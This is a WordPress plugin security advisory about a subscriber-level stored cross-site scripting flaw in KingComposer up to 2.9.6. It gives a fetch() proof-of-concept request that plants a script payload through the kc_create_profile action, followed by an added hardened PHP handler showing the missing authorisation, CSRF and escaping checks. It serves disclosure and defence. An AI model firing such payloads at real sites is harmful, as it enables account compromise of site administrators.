wpexploit
Krzysztof Zając
WPEX-ID: 5687E5DB-D987-416D-A7F4-036CCE4D56CB
History: Mar 14, 2022 - 12:00 a.m.

KingComposer <= 2.9.6 - Subscriber+ Stored Cross-Site Scripting

Tags: kingcomposer, stored cross-site scripting, subscriber+, profile creation

EPSS: 0.001 (percentile 24.8%)

The plugin lacks authorisation, CSRF and sanitisation/escaping checks when creating a profile, allowing any authenticated user to create arbitrary profiles containing Cross-Site Scripting payloads.

Create profile:

fetch("https://example.com/wp-admin/admin-ajax.php?action=kc_create_profile", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"name":"y", "slug": "y", "data": btoa("<script>alert(1);</script>")}),
  "method": "POST",
  "credentials": "include"
});

The XSS will be triggered at: https://example.com/wp-admin/admin-ajax.php?action=kc_download_profile&name=y
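As an added illustration (this is not KingComposer's code and is not part of the original advisory), the handler below shows how a WordPress AJAX endpoint for the same `kc_create_profile` / `kc_download_profile` actions could apply the three controls the advisory says are missing: a nonce against CSRF, a capability check for authorisation, and sanitisation on input plus non-HTML output for the download. The function names, the `manage_options` capability, the `nonce` field name and the `example_kc_profiles` option are assumptions; the real plugin's storage schema is not on the page.

```php
<?php
// Added illustrative example, not KingComposer's code. Function names, the
// capability, the nonce field name and the option name are assumptions.

add_action( 'wp_ajax_kc_create_profile', 'example_kc_create_profile_hardened' );

function example_kc_create_profile_hardened() {
    // 1. CSRF: require a nonce bound to this action and the current user.
    //    The client would obtain it from wp_create_nonce( 'kc_create_profile' )
    //    and send it in the 'nonce' field (field name assumed).
    check_ajax_referer( 'kc_create_profile', 'nonce' );

    // 2. Authorisation: "Subscriber+" in the advisory means any logged-in user
    //    could reach the action; require a capability only administrators hold.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }

    // 3. Sanitisation on input: constrain name and slug to safe character sets.
    $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
    $slug = isset( $_POST['slug'] ) ? sanitize_key( $_POST['slug'] ) : '';
    if ( '' === $name || '' === $slug ) {
        wp_send_json_error( array( 'message' => 'name and slug are required' ), 400 );
    }

    // The PoC sends 'data' base64-encoded. Decode in strict mode, then keep only
    // the HTML allowed in post content (wp_kses_post drops <script> and event
    // handler attributes) before storing.
    $raw = isset( $_POST['data'] ) ? base64_decode( wp_unslash( $_POST['data'] ), true ) : false;
    if ( false === $raw ) {
        wp_send_json_error( array( 'message' => 'data must be valid base64' ), 400 );
    }
    $data = wp_kses_post( $raw );

    // Storage location is assumed (constructed option name).
    $profiles          = get_option( 'example_kc_profiles', array() );
    $profiles[ $slug ] = array( 'name' => $name, 'data' => $data );
    update_option( 'example_kc_profiles', $profiles );

    wp_send_json_success( array( 'slug' => $slug ) );
}

// 4. Escaping on output: the download endpoint named in the advisory must not
//    echo stored data into an HTML context. Serving it as a JSON attachment with
//    nosniff prevents the browser from rendering it as a page.
add_action( 'wp_ajax_kc_download_profile', 'example_kc_download_profile_hardened' );

function example_kc_download_profile_hardened() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions' ), 403 );
    }
    // sanitize_key restricts the value to [a-z0-9_-], so it is also safe in the filename.
    $slug     = isset( $_GET['name'] ) ? sanitize_key( $_GET['name'] ) : '';
    $profiles = get_option( 'example_kc_profiles', array() );
    if ( ! isset( $profiles[ $slug ] ) ) {
        wp_send_json_error( array( 'message' => 'Unknown profile' ), 404 );
    }
    nocache_headers();
    header( 'Content-Type: application/json; charset=utf-8' );
    header( 'X-Content-Type-Options: nosniff' );
    header( 'Content-Disposition: attachment; filename="' . $slug . '.json"' );
    echo wp_json_encode( $profiles[ $slug ] );
    exit;
}
```

The check order matters: the nonce and capability tests run before any input is touched, so an unauthenticated or low-privilege request never reaches the storage code, and the download path changes the response from an HTML context to a JSON attachment so that whatever was stored cannot execute in the browser.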
